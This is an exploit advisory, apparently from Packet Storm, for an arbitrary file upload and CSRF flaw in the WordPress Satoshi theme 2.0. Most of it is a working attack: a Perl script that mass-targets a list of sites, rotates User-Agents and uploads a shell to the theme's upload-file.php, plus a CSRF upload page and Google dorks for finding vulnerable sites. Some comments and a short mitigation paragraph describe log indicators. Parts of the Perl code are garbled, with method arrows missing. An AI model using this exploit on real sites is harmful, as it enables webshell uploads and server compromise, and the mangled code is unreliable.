WordPress Satoshi 2.0 Cross Site Request Forgery / File Upload

  • WordPress Satoshi theme version 2.0 suffers from cross site request forgery and remote file upload vulnerabilities.
    MD5 | c35cb6f75567c153b011c7612c626cf3

    ####################################################################  
    # Exploit Title : WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload  
    # Author [ Discovered By ] : KingSkrupellos  
    # Team : Cyberizm Digital Security Army  
    # Date : 05/06/2019  
    # Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com  
    # WordPress Affected Versions : 4.7.13 - 3.4.2  
    # Theme Affected Version : 2.0  
    # Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx  
    themesinfo.com/?search_type=folder&search=satoshi  
    # Theme used on : 106 websites  
    # Tested On : Windows and Linux  
    # Category : WebApps  
    # Exploit Risk : Medium  
    # Google Dorks : intext:Design By Voosh Themes  
    inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica -   
    # Vulnerability Type :   
    CWE-352 [ Cross-Site Request Forgery (CSRF) ]  
    CWE-264 [ Permissions, Privileges, and Access Controls ]  
    # PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
    # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
    # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
    ####################################################################  
    # Description About Software :  
    *****************************  
    Satoshi v2.0 theme WordPress portfolio. A Free Portfolio Theme Developed By Voosh Themes.  
    ####################################################################  
    # Impact :  
    ***********  
    WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers  
    upload arbitrary files because it fails to adequately sanitize user-supplied input.  
    An attacker can exploit this vulnerability to upload arbitrary code and execute  
    it in the context of the webserver process. This may facilitate unauthorized access  
    or privilege escalation; other attacks are also possible. This WordPress theme is also  
    vulnerable to CSRF file upload via ajaxupload.3.5.js. CSRF occurs when a web application  
    does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request  
    was intentionally provided by the user who submitted the request.  
    The upload flaw is of the kind usually catalogued as CWE-434 (Unrestricted Upload of File  
    with Dangerous Type). Sites running the theme can reduce exposure by removing or restricting  
    access to the theme's upload-file.php and by reviewing the theme's images/ directory for  
    files that are not images.  
    ####################################################################  
    # Vulnerability :  
    ***************  
    /wp-content/themes/satoshi/upload-file.php  
    Vulnerability Message :  
    *********************  
    error  
    Directory File Path :  
    ******************  
    /wp-content/themes/satoshi/images/[YOURFILENAME].html  
    # Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :  
    ********************************************************  
    #!/usr/bin/perl  
    use LWP::UserAgent;  
    # Coded By KingSkrupellos  
    # Cyberizm Digital Security Army  
    # Perl Exploiter By CyBeRiZM :)  
    # Path of the theme's upload handler; expqq appends it to ".../themes/satoshi/".  
    # The value begins with "/" and that prefix already ends with "/", so the requests  
    # this script sends contain "satoshi//upload-file.php" (double slash), which is a  
    # usable search pattern in web server access logs.  
    my $qqvul ="/upload-file.php";#theme path vul  
    # Start time as a human-readable string; printed once before the run begins.  
    my $datestring = localtime();  
    # Broken-down local time assigned to undeclared package globals. None of these  
    # variables is read anywhere in the listing shown.  
    ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();  
    # randomagent: return one User-Agent string picked at random from six hard-coded  
    # desktop browser strings. Takes no arguments.  
    # expqq calls this once per site, so the traffic presents an ordinary (if dated)  
    # browser identity that changes between sites. Filtering on User-Agent alone will  
    # therefore not reliably separate these requests; the request path and method are  
    # the more stable indicators.  
    sub randomagent {  
    my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',  
    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',  
    'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',  
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',  
    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'  
    );  
    # rand @array yields a fraction below the element count; the subscript truncates it  
    # to an integer index.  
    my $random = $array[rand @array];  
    return($random);  
    }  
    # Main driver: print the banner, prompt for a file of site addresses and for the  
    # name of a local file, then call expqq once per address.  
    flag();  
    print "[+] Enter List Of Target : ";  
    # <> reads from STDIN when the script is started without command-line arguments.  
    chomp (my $list=<>);  
    print "[+] Enter Evil File : ";  
    chomp (my $file=<>);  
    print "[+] Started : $datestring\n";  
    # The mode and the file name are concatenated into a single string, i.e. this is the  
    # two-argument form of open; the script dies with the OS error if the open fails.  
    open(my $arq,'<'.$list) || die($!);  
    my @site = <$arq>;  
    # Drop empty lines from the list.  
    @site = grep { !/^$/ } @site;  
    close($arq);  
    print "[".($#site+1)."] URL to test upload\n\n";   
    my $i;  
    foreach my $web(@site){$i++;  
    chomp($web);  
    # Entries without a scheme are given a plain "http://" prefix.  
    if($web !~ /^(http|https):\/\//){  
    $web = 'http://'.$web;  
    }  
    print "[$i] $web \n";  
    # Per site, expqq (defined below) issues a GET to the theme's upload-file.php, then a  
    # multipart/form-data POST to the same path with a field named "uploadfile", then a  
    # GET for the same file name under the theme's images/ directory. It sets a 10-second  
    # timeout and disables TLS hostname verification. That GET/POST/GET sequence against  
    # these two paths is the pattern to look for when reviewing access logs.  
    expqq($web);#exploiting website :)  
    }   
    sub expqq{  
    my $useragent = randomagent();#Get a Random User Agent   
    my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept   
    $ua->timeout(10);  
    $ua->agent($useragent);  
    print "[Testing] Exploit Existence \n";  
    my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;  
    my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;  
    my $response = $ua->get($url);  
    if ($response

    is_success || $response

    content=~/error/){ print "[OK] Exploit Exists\n"; print "[*] Sent payload\n"; my $regex = 'success'; my $body = $ua->post( $url, Content_Type => 'form-data', Content => [ 'uploadfile' => ["$file"] ] ); if ($body

    is_success ||$body

    content=~ /$regex/){ print "[+] Payload successfully executed\n"; print "[*] Checking if shell was uploaded\n\n"; my $res = $ua->get($ss); if ($res->is_success){ print "[Upload] $_[0]/wp-content/satoshi/images/$file\n"; } else { print "[Faild] check file\n"; } } else {print "[-] Payload failed : Not vulnerable\n"; } } else { print "[No] Exploit Not Found\n"; } } sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n"; } #################################################################### Cross Site Request Forgery CSRF Exploiter : ***************************************** <!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title></title> <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script> <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script> <script type='text/javascript'>//<![CDATA[ window.onload=function(){ $(function(){ var btnUpload=$('#upload'); var status=$('#logo-upload-status'); new AjaxUpload(btnUpload, { action: 'http://localhost/wp-content/themes/satoshi/upload-file.php', name: 'uploadfile', onSubmit: function(file, ext){ /* if (! 
(ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){ // extension is not allowed status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed'); return false; }*/ status.text('Uploading...'); }, onComplete: function(file, response){ //On completion clear the status status.text(''); //Add uploaded file to list if(response==="success"){ $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success'); $('#satoshi_logo_image').val(file); } else{ $('<li></li>').appendTo('#files').text(file).addClass('error'); } } }); }); }//]]> </script> </head> <body> <span id="logo-upload-status"></span> <input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value=""> <input type="button" class="background_pattern_button" id="upload" value="Choose Logo"> </body> </html> #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################

    Source: packetstormsecurity.com
